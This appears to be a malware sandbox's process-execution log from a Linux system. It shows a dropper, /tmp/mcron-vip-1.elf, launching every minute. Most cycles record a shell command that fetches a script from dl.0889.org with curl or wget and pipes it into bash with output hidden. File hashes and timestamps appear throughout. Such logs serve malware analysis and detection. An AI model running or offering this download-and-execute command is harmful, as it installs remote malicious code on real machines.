                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:06:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:06:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:06:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:06:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:06:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:06:53
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:06:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:06:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:07:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:07:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:07:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:07:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:07:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:07:54
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:07:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:07:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:08:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:08:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:08:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:08:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:08:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:08:53
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:08:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:08:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:09:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:09:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:09:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:09:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:09:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:09:53
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:09:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:09:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:10:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:10:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:10:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:10:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:10:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:10:54
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:10:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:10:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:11:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:11:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:11:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:11:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:11:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:11:54
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:11:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:11:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:12:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:12:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:12:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:12:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:12:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:12:54
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:12:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:12:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:13:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:13:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:13:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:13:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:13:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:13:54
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:13:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:13:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/usr/lib/udisks2/udisksd
                            Arguments:-
                            File size:483056 bytes
                            MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/usr/sbin/dumpe2fs
                            Arguments:dumpe2fs -h /dev/dm-0
                            File size:31112 bytes
                            MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4